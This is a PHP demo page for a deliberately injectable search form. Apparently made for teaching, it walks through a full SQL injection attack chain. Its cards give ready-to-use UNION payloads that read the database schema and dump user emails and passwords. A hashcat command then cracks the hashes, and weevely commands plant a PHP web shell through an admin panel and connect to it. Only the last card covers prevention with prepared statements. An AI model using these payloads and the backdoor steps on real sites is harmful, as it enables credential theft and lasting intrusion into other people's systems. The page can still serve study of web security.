index.php

<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Most secure website</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link rel="stylesheet" href="css/style.css" crossorigin="anonymous" />
    <link rel="shortcut icon" type="image/ico" href="img/favicon.ico" />

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    <!-- our api script -->
    <script type='text/javascript' src="js/api.js"></script>

</head>

<body>
    <div class="m-3">
        <h4 class="text-center m-3 text-primary">Welcome to web exploit</h4>
        <div class="center card mt-3 p-0">
            <form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
                <div class="input-group">
                    <input autocomplete="off" id="query" type="text" class="form-control" placeholder="search a term" name="query">
                    <button class="btn btn-outline-secondary" type="submit" id="button-addon2">
                        <i class="fa fa-search"></i>
                    </button>
                </div>
            </form>
            <p class="m-3 text-muted"><small>original query </small> <br> SELECT * FROM article WHERE article LIKE '% ? %'</p>

            <p class="m-3 text-danger"><small>server output </small> <br>
                <?php
                include_once('scripts/api.php');
                if ($_SERVER["REQUEST_METHOD"] == "POST") {
                    $query = $_POST['query'];

                    get_articles($query);
                }
                ?>
            </p>
        </div>

        <div class="row mt-3">
            <div class="col card m-2 p-3">
                <h5>Initial test for query structure</h5>
                <p class="text-success"><small class="text-primary">input </small> <br> %'AND 1 = 1 AND '%' = '</p>
                <p><small class="text-primary">expl</small> <br>
                    This checks if the query still works, this output of the query resolves
                    to true, which should run as dev expected </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Another test for query structure</h5>
                <p class="text-success"><small class="text-primary">input </small> <br>%'AND 1 = 2 AND '%' = '</p>
                <p><small class="text-primary">expl</small> <br>
                    This resolves to false condition and should not return any data at all </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Get the sql version for current db</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>is %' UNION SELECT VERSION() UNION SELECT '%' = ' </p>
                <p><small class="text-primary">expl</small> <br>
                    This will execute multiple queries at once, allowing us to get the
                    mysql version info </p>
            </div>
        </div>

        <div class="row mt-3">
            <div class="col card m-2 p-3">
                <h5>Extract table names from information schema</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                    is %' UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() UNION SELECT '%' = ' </p>
                <p><small class="text-primary">expl</small> <br>
                    This will execute multiple queries at once, allowing us to get the
                    mysql version info </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Extract table columns from target table</h5>
                <p class="text-success"><small class="text-primary">input</small> <br> is %' UNION
                    SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='user'
                    UNION SELECT '%' = ' </p>
                <p><small class="text-primary">expl</small> <br>
                    This will return the column names for the 'user' table </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Select data from the target table</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                    is %' UNION SELECT group_concat(email, password) FROM user UNION SELECT '%' = ' </p>
                <p><small class="text-primary">expl</small> <br>
                    This will return the column names for the 'user' table </p>
            </div>

        </div>

        <div class="row mt-3">
            <div class="col card m-2 p-3">
                <h5>Find the password from the hash</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                <pre>$ hashcat -m 0 -a 0 hash.txt "passwords_list"</pre>
                </p>
                <p><small class="text-primary">expl</small> <br>
                    Since, mysql may use MD5 we use (-m 0) or for php hash type (-m 400).<br>
                    The mode of attack (-a 0) is straight, there are other modes too. <br>
                    (hash.txt) is our password hash, (password_list) is sample pass list to bruteforce. </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Login to admin panel of website (mostly for wordpress)</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                    create a new php file or update existing </p>
                <p><small class="text-primary">expl</small> <br>
                    Copy the contents of ssh.php which was created as below using
                    <a href="https://github.com/epinna/weevely3">weevely tool</a> <br>
                <pre>$ weevely generate 'password' ./ssh.php</pre>
                which will generate a php file on the server in admin panel.
                </p>
            </div>

            <div class="col card m-2 p-3">
                <h5>Final step connect to the target host</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                    use the backdoor which we just planted </p>
                <p><small class="text-primary">expl</small> <br>
                    Type the following in your command line <br>
                <pre>$ weevely 'url' 'password'</pre>
                here (url) is the url of the website, (pass) is the password used to
                generate the file.
                </p>
            </div>

        </div>

        <div class="row mt-3">
            <div class="col card m-2 p-3">
                <h5>How to avoid sql-injection attacks like this</h5>
                <p class="text-success"><small class="text-primary">input</small> <br>
                    just use <a href="https://www.php.net/manual/en/mysqli.quickstart.prepared-statements.php">
                        prepared statements</a> </p>
                <p><small class="text-primary">expl</small> <br>
                    Prepared statements validate the statements executed, also keep a strong password
                    along with 'disallow multiple queries'.
                </p>
            </div>

        </div>
    </div>
</body>

</html>